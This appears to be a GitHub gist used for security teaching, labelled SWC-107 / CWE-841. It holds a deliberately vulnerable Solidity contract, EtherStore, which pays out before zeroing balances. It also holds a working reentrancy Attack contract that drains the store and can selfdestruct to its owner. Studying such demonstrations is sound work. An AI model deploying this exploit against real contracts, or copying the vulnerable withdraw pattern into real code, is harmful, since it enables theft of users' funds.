Last active
March 31, 2022 04:57
-
-
Save mikkipastel/89d4c99be9abe2c9f5694192b71ce4d8 to your computer and use it in GitHub Desktop.
SWC-107 : Reentrancy / CWE-841: Improper Enforcement of Behavioral Workflow from KBTG Inspire2
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| pragma solidity ^0.8.0; | |
| contract EtherStore { | |
| mapping(address => uint256) public balances; | |
| function deposit() public payable { | |
| balances[msg.sender] += msg.value; | |
| } | |
| function withdraw() public { | |
| uint256 balance = balances[msg.sender]; | |
| require(balance > 0, "Not enough Ether"); | |
| // External Call | |
| (bool sent, ) = payable(msg.sender).call{value: balance}(""); | |
| require(sent, "Failed to send Ether"); | |
| // Update balance, write state | |
| balances[msg.sender] = 0; | |
| } | |
| function getBalance() public view returns(uint256) { | |
| return address(this).balance; | |
| } | |
| } | |
| contract Attack { | |
| EtherStore public etherStore; | |
| constructor(address _etherStoreAddress) public { | |
| etherStore = EtherStore(_etherStoreAddress); | |
| } | |
| fallback() external payable { | |
| // Withdraw at least 1 Ether | |
| if (address(etherStore).balance >= 1 ether) { | |
| etherStore.withdraw(); | |
| } | |
| } | |
| function attack() external payable { | |
| require(msg.value >= 1 ether, "require at least 1 Eth"); | |
| etherStore.deposit{value: 1 ether}(); | |
| etherStore.withdraw(); | |
| } | |
| function getBalance() public view returns(uint256) { | |
| return address(this).balance; | |
| } | |
| function kill() external payable { | |
| selfdestruct(payable(msg.sender)); | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment